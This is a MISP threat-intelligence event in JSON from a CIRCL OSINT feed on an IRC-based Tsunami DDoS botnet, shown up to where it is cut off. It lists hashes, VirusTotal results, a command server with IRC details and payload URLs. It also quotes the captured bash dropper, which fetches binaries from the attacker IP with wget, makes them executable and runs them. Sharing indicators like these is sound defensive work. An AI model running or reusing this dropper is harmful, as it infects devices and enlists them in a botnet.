misp-circl-feed/feeds/circl/misp/5cc410a0-be10-4990-acf6-44cc02de0b81.json

1760 lines
60 KiB
JSON
Raw Normal View History

2023-04-21 13:25:09 +00:00
{
"Event": {
"analysis": "2",
"date": "2019-04-27",
"extends_uuid": "",
"info": "OSINT - Analysis of an IRC based Botnet",
"publish_timestamp": "1556355887",
"published": true,
"threat_level_id": "3",
"timestamp": "1556355866",
"uuid": "5cc410a0-be10-4990-acf6-44cc02de0b81",
"Orgc": {
"name": "CIRCL",
"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
},
"Tag": [
{
"colour": "#004646",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "type:OSINT",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#0071c3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "osint:lifetime=\"perpetual\"",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#0087e8",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "osint:certainty=\"50\"",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#ffffff",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "tlp:white",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#0088cc",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "misp-galaxy:malpedia=\"Tsunami\"",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#5ed600",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "ddos:type=\"flooding-attack\"",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#00bdbd",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "ecsirt:availability=\"ddos\"",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556353198",
"to_ids": true,
"type": "sha256",
"uuid": "5cc410ae-1374-4513-b215-479e02de0b81",
"value": "49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556354973",
"to_ids": true,
"type": "url",
"uuid": "5cc4179d-5500-4efe-a798-492b02de0b81",
"value": "http://185.244.25.235/mips"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556354973",
"to_ids": true,
"type": "url",
"uuid": "5cc4179d-bff0-47d9-aadc-4c0e02de0b81",
"value": "http://185.244.25.235/mipsel"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556354973",
"to_ids": true,
"type": "url",
"uuid": "5cc4179d-c50c-43dd-905d-4e5f02de0b81",
"value": "http://185.244.25.235/sh4"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556354973",
"to_ids": true,
"type": "url",
"uuid": "5cc4179d-d280-413b-9c00-492c02de0b81",
"value": "http://185.244.25.235/x86"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556354973",
"to_ids": true,
"type": "url",
"uuid": "5cc4179d-5b24-41a5-97b7-4c6802de0b81",
"value": "http://185.244.25.235/armv7l"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556354973",
"to_ids": true,
"type": "url",
"uuid": "5cc4179d-15ec-4cc3-a885-44c702de0b81",
"value": "http://185.244.25.235/armv6l"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556354973",
"to_ids": true,
"type": "url",
"uuid": "5cc4179d-f0bc-4279-a64b-478a02de0b81",
"value": "http://185.244.25.235/i686"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556354973",
"to_ids": true,
"type": "url",
"uuid": "5cc4179d-023c-4b02-ae81-43bf02de0b81",
"value": "http://185.244.25.235/powerpc"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556354973",
"to_ids": true,
"type": "url",
"uuid": "5cc4179d-9a80-4f29-af94-4ccd02de0b81",
"value": "http://185.244.25.235/i586"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556354973",
"to_ids": true,
"type": "url",
"uuid": "5cc4179d-ef0c-426c-9b7c-4e3802de0b81",
"value": "http://185.244.25.235/m68k"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556354973",
"to_ids": true,
"type": "url",
"uuid": "5cc4179d-1d2c-4f08-861f-4a8802de0b81",
"value": "http://185.244.25.235/sparc"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556354973",
"to_ids": true,
"type": "url",
"uuid": "5cc4179d-a5f4-4644-8938-448102de0b81",
"value": "http://185.244.25.235/armv4l"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556354973",
"to_ids": true,
"type": "url",
"uuid": "5cc4179d-ecc4-4beb-b4f1-4f8902de0b81",
"value": "http://185.244.25.235/armv5l"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556354973",
"to_ids": true,
"type": "url",
"uuid": "5cc4179d-4048-4450-913a-415a02de0b81",
"value": "http://185.244.25.235/440fp"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "5cc41804-cc64-4ea0-ac90-41a702de0b81",
"value": "31784de70d7b55b2ee48a9ae359f7c67c82fb9a814279e0944a9dee01ed3f756"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "5cc41804-b52c-4fc2-9cc7-4b2502de0b81",
"value": "fd43c0abfaa6e6203e24bdb015613801f4a23894aba9586b0bdf1e70736883e5"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "5cc41804-2b74-4df3-9d09-4d0d02de0b81",
"value": "284bde3fc80d81eb2cf644770df64c59cc444f283bd4ab96f64431fef735879a"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "5cc41804-7878-4dcf-a69c-474802de0b81",
"value": "32776a1a3eb8914855b57972c94750e0bb1dedd3ed161fdb53098cdfcee74ce3"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "5cc41804-7f90-42a3-8865-4b6e02de0b81",
"value": "976e948ccec98ffd36115d0240c2a438dccd4e15d220284e6356e3fcb0f2548c"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "5cc41804-dbd0-464c-b6de-462202de0b81",
"value": "f031d926d80805795c20d1a7b280759d1393e736a85f7fd2e02d2088f2fb0221"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "5cc41804-235c-49fe-8303-4a8e02de0b81",
"value": "3efdd1461af3cf4039bd7a3ababcf71c5df08a1c232a36287d9ae1f0bd7509cc"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "5cc41804-58f0-4fff-810e-472d02de0b81",
"value": "34fa4705a10ca0d940762f5f594bbf93fe79f1df2bf4a1fb69fe9b00ff79b2fe"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "5cc41804-a4c8-4691-8b09-443902de0b81",
"value": "3549fca31abf602a78f645d3406ad075e02c7ea9a6aa9cec243ba6cb58b5e39f"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "5cc41804-31dc-4d16-b61e-4b6502de0b81",
"value": "62997b5ecc8bb785f16803cdd04d2b4209476e457d9a46cbb1f7fae0a6a8108d"
},
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1556355783",
"to_ids": false,
"type": "link",
"uuid": "5cc41ac7-0aa4-4bff-8f34-4bd402de0b81",
"value": "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet"
}
],
"Object": [
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "15",
"timestamp": "1556354542",
"uuid": "332718dd-e3ba-40b1-bb59-06318357f8e2",
"ObjectReference": [
{
"comment": "",
"object_uuid": "332718dd-e3ba-40b1-bb59-06318357f8e2",
"referenced_uuid": "ec7ab03e-c8dd-4dd2-886e-cf39dada576c",
"relationship_type": "analysed-with",
"timestamp": "1556353212",
"uuid": "5cc410bc-73a0-4933-8799-4e0c02de0b81"
},
{
"comment": "",
"object_uuid": "332718dd-e3ba-40b1-bb59-06318357f8e2",
"referenced_uuid": "5cc410e3-9a44-4c3a-abb2-498602de0b81",
"relationship_type": "connects-to",
"timestamp": "1556353280",
"uuid": "5cc41100-81b4-4504-9ec5-4ce202de0b81"
},
{
"comment": "",
"object_uuid": "332718dd-e3ba-40b1-bb59-06318357f8e2",
"referenced_uuid": "5cc4152b-efe8-4b4e-a4ff-4c8c02de0b81",
"relationship_type": "connects-to",
"timestamp": "1556354542",
"uuid": "5cc415ee-fba8-4915-89b9-4d6202de0b81"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1556353198",
"to_ids": true,
"type": "md5",
"uuid": "353bb33b-de63-4356-ba84-d6046e4279db",
"value": "82062b666f09fc5c0fe4f68d1ea90916"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1556353198",
"to_ids": true,
"type": "sha1",
"uuid": "a928df56-4559-47ab-83d6-f5f7a7cbec25",
"value": "b35d4b7980d361874e84e76eddbaff83c2c5790f"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1556353198",
"to_ids": true,
"type": "sha256",
"uuid": "133120eb-20ec-401c-9c89-47272373bb05",
"value": "49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0"
}
]
},
{
"comment": "",
"deleted": false,
"description": "VirusTotal report",
"meta-category": "misc",
"name": "virustotal-report",
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
"template_version": "2",
"timestamp": "1556353212",
"uuid": "ec7ab03e-c8dd-4dd2-886e-cf39dada576c",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "last-submission",
"timestamp": "1556353198",
"to_ids": false,
"type": "datetime",
"uuid": "4bef3161-25cf-4364-bcef-432bc49c6834",
"value": "2018-12-21T07:40:44"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "permalink",
"timestamp": "1556353198",
"to_ids": false,
"type": "link",
"uuid": "73e29dd1-c3dd-40bd-91e1-660a20460fe9",
"value": "https://www.virustotal.com/file/49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0/analysis/1545378044/"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "detection-ratio",
"timestamp": "1556353198",
"to_ids": false,
"type": "text",
"uuid": "cbd0000d-8368-430e-85e0-7c2cd4871b09",
"value": "26/57"
}
]
},
{
"comment": "",
"deleted": false,
"description": "An IP address (or domain or hostname) and a port seen as a tuple (or as a triple) in a specific time frame.",
"meta-category": "network",
"name": "ip-port",
"template_uuid": "9f8cea74-16fe-4968-a2b4-026676949ac6",
"template_version": "7",
"timestamp": "1556353315",
"uuid": "5cc410e3-9a44-4c3a-abb2-498602de0b81",
"ObjectReference": [
{
"comment": "",
"object_uuid": "5cc410e3-9a44-4c3a-abb2-498602de0b81",
"referenced_uuid": "5cc410ae-1374-4513-b215-479e02de0b81",
"relationship_type": "connected-from",
"timestamp": "1556353315",
"uuid": "5cc41123-6a44-4259-96bf-497602de0b81"
}
],
"Attribute": [
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ip",
"timestamp": "1556353251",
"to_ids": true,
"type": "ip-dst",
"uuid": "5cc410e3-d92c-4425-a0ab-49f202de0b81",
"value": "185.244.25.235"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "dst-port",
"timestamp": "1556353251",
"to_ids": false,
"type": "port",
"uuid": "5cc410e3-28e0-44f4-ab38-44da02de0b81",
"value": "80"
}
]
},
{
"comment": "",
"deleted": false,
"description": "An IRC object to describe an IRC server and the associated channels.",
"meta-category": "network",
"name": "irc",
"template_uuid": "4bbbc004-c344-4b20-8672-b41102177fc7",
"template_version": "2",
"timestamp": "1556355330",
"uuid": "5cc4152b-efe8-4b4e-a4ff-4c8c02de0b81",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "nickname",
"timestamp": "1556355330",
"to_ids": false,
"type": "text",
"uuid": "5cc4152c-470c-4c48-b864-48d302de0b81",
"value": "AmpAttacks"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ip",
"timestamp": "1556355330",
"to_ids": true,
"type": "ip-dst",
"uuid": "5cc4152c-86c0-4511-bc5f-450902de0b81",
"value": "185.244.25.235"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "channel",
"timestamp": "1556355330",
"to_ids": false,
"type": "text",
"uuid": "5cc4152c-bd1c-4174-94ba-4c7202de0b81",
"value": "Summit"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "dst-port",
"timestamp": "1556355330",
"to_ids": false,
"type": "port",
"uuid": "5cc4152c-6de0-4f8b-8e6f-4d1d02de0b81",
"value": "6667"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "nickname",
"timestamp": "1556355330",
"to_ids": false,
"type": "text",
"uuid": "5cc41660-2350-47b7-8703-4df902de0b81",
"value": "[x86_64|BWQLXKB]"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "nickname",
"timestamp": "1556355330",
"to_ids": false,
"type": "text",
"uuid": "5cc41660-a6c4-4736-a284-4b7902de0b81",
"value": "[MIPS|WGEQAV]"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "nickname",
"timestamp": "1556355330",
"to_ids": false,
"type": "text",
"uuid": "5cc41660-b8d8-4c08-a98b-4c3002de0b81",
"value": "[ARM4T|PCVREB]"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
"meta-category": "misc",
"name": "script",
"template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
"template_version": "3",
"timestamp": "1556355040",
"uuid": "5cc417e0-af4c-4df0-974b-4cd102de0b81",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "script",
"timestamp": "1556355041",
"to_ids": false,
"type": "text",
"uuid": "5cc417e1-d624-429e-a881-407a02de0b81",
"value": "#!/bin/bash\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/mips; chmod +x mips; ./mips; rm -rf mips\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipsel\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/sh4; chmod +x sh4; ./sh4; rm -rf sh4\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/x86; chmod +x x86; ./x86; rm -rf x86\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv7l; chmod +x armv7l; ./armv7l; rm -rf armv7l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv6l; chmod +x armv6l; ./armv6l; rm -rf armv6l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/i686; chmod +x i686; ./i686; rm -rf i686\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/powerpc; chmod +x powerpc; ./powerpc; rm -rf powerpc\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/i586; chmod +x i586; ./i586; rm -rf i586\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/m68k; chmod +x m68k; ./m68k; rm -rf m68k\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/sparc; chmod +x sparc; ./sparc; rm -rf sparc\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv4l; chmod +x armv4l; ./armv4l; rm -rf armv4l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv5l; chmod +x armv5l; ./armv5l; rm -rf armv5l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/440fp; chmod +x 440fp; ./440fp; rm -rf 440fp"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "language",
"timestamp": "1556355041",
"to_ids": false,
"type": "text",
"uuid": "5cc417e1-3a1c-422d-bd78-4e8102de0b81",
"value": "Bash"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "filename",
"timestamp": "1556355050",
"to_ids": false,
"type": "filename",
"uuid": "5cc417e1-3490-4743-8a5d-42ae02de0b81",
"value": "sh"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "state",
"timestamp": "1556355041",
"to_ids": false,
"type": "text",
"uuid": "5cc417e1-9198-4713-9aeb-4ee602de0b81",
"value": "Malicious"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "15",
"timestamp": "1556355092",
"uuid": "6264284d-c9d5-4c12-8ba3-0f3c4ac9231a",
"ObjectReference": [
{
"comment": "",
"object_uuid": "6264284d-c9d5-4c12-8ba3-0f3c4ac9231a",
"referenced_uuid": "c584310f-cfa6-4ca0-b283-88853eff679e",
"relationship_type": "analysed-with",
"timestamp": "1556355095",
"uuid": "5cc41817-0044-43c2-9144-44f502de0b81"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1556355076",
"to_ids": true,
"type": "md5",
"uuid": "3c442568-e293-401d-a37c-0ab855c50bf8",
"value": "1cc9232302cb7569dc6dcd76fe5d7c48"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha1",
"uuid": "1a4460ab-f231-431f-9c40-8a14127a21db",
"value": "3c24b5150afbcfc8b5b98740329e279c778acfec"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "42a36b99-1c82-482e-b298-8812fcfbea2d",
"value": "284bde3fc80d81eb2cf644770df64c59cc444f283bd4ab96f64431fef735879a"
}
]
},
{
"comment": "",
"deleted": false,
"description": "VirusTotal report",
"meta-category": "misc",
"name": "virustotal-report",
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
"template_version": "2",
"timestamp": "1556355092",
"uuid": "c584310f-cfa6-4ca0-b283-88853eff679e",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "last-submission",
"timestamp": "1556355076",
"to_ids": false,
"type": "datetime",
"uuid": "c979bfbb-fa6b-435e-a994-2212c5b430ee",
"value": "2019-04-07T05:10:51"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "permalink",
"timestamp": "1556355076",
"to_ids": false,
"type": "link",
"uuid": "4db99dd0-83ff-456e-9796-816f83b2c265",
"value": "https://www.virustotal.com/file/284bde3fc80d81eb2cf644770df64c59cc444f283bd4ab96f64431fef735879a/analysis/1554613851/"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "detection-ratio",
"timestamp": "1556355076",
"to_ids": false,
"type": "text",
"uuid": "dcffe0ba-339e-4ab0-b00d-729db80d1bf5",
"value": "35/55"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "15",
"timestamp": "1556355093",
"uuid": "a6383e65-36cc-4e3a-8d2e-439afdb5a58b",
"ObjectReference": [
{
"comment": "",
"object_uuid": "a6383e65-36cc-4e3a-8d2e-439afdb5a58b",
"referenced_uuid": "dc71966f-e4cf-4026-a133-50090fd4b95b",
"relationship_type": "analysed-with",
"timestamp": "1556355095",
"uuid": "5cc41817-5014-466a-a830-49fd02de0b81"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1556355076",
"to_ids": true,
"type": "md5",
"uuid": "4fd4815a-d6f1-4454-9d0b-740c1f4b120d",
"value": "e49d17afc76617a6b2a445ef21342454"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha1",
"uuid": "d72918eb-514b-4c72-8116-4420d1a08546",
"value": "5d223085ca23494fd18622e6bc6d81b6f8eaa8a8"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "60614b70-e5de-484f-a5ce-1736fd2c69f3",
"value": "3efdd1461af3cf4039bd7a3ababcf71c5df08a1c232a36287d9ae1f0bd7509cc"
}
]
},
{
"comment": "",
"deleted": false,
"description": "VirusTotal report",
"meta-category": "misc",
"name": "virustotal-report",
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
"template_version": "2",
"timestamp": "1556355093",
"uuid": "dc71966f-e4cf-4026-a133-50090fd4b95b",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "last-submission",
"timestamp": "1556355076",
"to_ids": false,
"type": "datetime",
"uuid": "4c0b0672-508b-41f5-8ff0-6b13ee76b5c5",
"value": "2019-04-14T04:40:19"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "permalink",
"timestamp": "1556355076",
"to_ids": false,
"type": "link",
"uuid": "1c60fb0a-aa1f-4dbc-a9ab-dc741863af4a",
"value": "https://www.virustotal.com/file/3efdd1461af3cf4039bd7a3ababcf71c5df08a1c232a36287d9ae1f0bd7509cc/analysis/1555216819/"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "detection-ratio",
"timestamp": "1556355076",
"to_ids": false,
"type": "text",
"uuid": "c5d88b4d-d908-4ecd-bcb1-bccf7e878a70",
"value": "37/57"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "15",
"timestamp": "1556355093",
"uuid": "7c1420e2-b2c6-455a-ae2d-675b32ffa908",
"ObjectReference": [
{
"comment": "",
"object_uuid": "7c1420e2-b2c6-455a-ae2d-675b32ffa908",
"referenced_uuid": "67696428-f0ea-4068-b00a-f669ee50ae03",
"relationship_type": "analysed-with",
"timestamp": "1556355096",
"uuid": "5cc41818-142c-4b71-9410-445802de0b81"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1556355076",
"to_ids": true,
"type": "md5",
"uuid": "62e954a3-4db9-457b-9cd1-d2af06616d3c",
"value": "30097dc12f07b9d44fd4bb32ea30cd4e"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha1",
"uuid": "867e4b1e-b031-46ea-9753-8b1ec86a21ff",
"value": "4f2350b20810ad45d40036c12d23239df1e3eaad"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "44cffa81-e17b-4721-97d0-ba17f13dbdb8",
"value": "32776a1a3eb8914855b57972c94750e0bb1dedd3ed161fdb53098cdfcee74ce3"
}
]
},
{
"comment": "",
"deleted": false,
"description": "VirusTotal report",
"meta-category": "misc",
"name": "virustotal-report",
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
"template_version": "2",
"timestamp": "1556355093",
"uuid": "67696428-f0ea-4068-b00a-f669ee50ae03",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "last-submission",
"timestamp": "1556355076",
"to_ids": false,
"type": "datetime",
"uuid": "16887f29-8d0c-46bd-a5ba-43b819d1b5f3",
"value": "2019-04-06T09:09:47"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "permalink",
"timestamp": "1556355076",
"to_ids": false,
"type": "link",
"uuid": "08a55fac-9627-496d-b5f1-d2fff1469956",
"value": "https://www.virustotal.com/file/32776a1a3eb8914855b57972c94750e0bb1dedd3ed161fdb53098cdfcee74ce3/analysis/1554541787/"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "detection-ratio",
"timestamp": "1556355076",
"to_ids": false,
"type": "text",
"uuid": "1ad4c142-b928-4b40-954b-ed89873761fa",
"value": "35/56"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "15",
"timestamp": "1556355093",
"uuid": "45275180-143d-4606-9cd3-6bc35646d412",
"ObjectReference": [
{
"comment": "",
"object_uuid": "45275180-143d-4606-9cd3-6bc35646d412",
"referenced_uuid": "5a3041a4-6ba6-4ce5-8d08-59693a3c3703",
"relationship_type": "analysed-with",
"timestamp": "1556355096",
"uuid": "5cc41818-d8e8-40a7-95c0-4f6b02de0b81"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1556355076",
"to_ids": true,
"type": "md5",
"uuid": "9a33a2c4-25a7-4482-b5a5-00072f8e46e4",
"value": "5a56f0b53d7639c3775b41de95b4902e"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha1",
"uuid": "6b191b84-dc39-4537-b012-8b6dce7695ad",
"value": "18f0a1a2f448d2a5824566a080b32f5d5f291075"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "582b2349-c7ce-45f4-afcb-595f2fe6bd14",
"value": "34fa4705a10ca0d940762f5f594bbf93fe79f1df2bf4a1fb69fe9b00ff79b2fe"
}
]
},
{
"comment": "",
"deleted": false,
"description": "VirusTotal report",
"meta-category": "misc",
"name": "virustotal-report",
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
"template_version": "2",
"timestamp": "1556355093",
"uuid": "5a3041a4-6ba6-4ce5-8d08-59693a3c3703",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "last-submission",
"timestamp": "1556355076",
"to_ids": false,
"type": "datetime",
"uuid": "28219f45-de8f-443f-95ea-f953b32ab42c",
"value": "2019-04-14T04:38:58"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "permalink",
"timestamp": "1556355076",
"to_ids": false,
"type": "link",
"uuid": "9e8d82d4-4886-40e5-b15c-c1f75bb6e0ad",
"value": "https://www.virustotal.com/file/34fa4705a10ca0d940762f5f594bbf93fe79f1df2bf4a1fb69fe9b00ff79b2fe/analysis/1555216738/"
},
{
"category": "Payload delivery",
"comment": "",
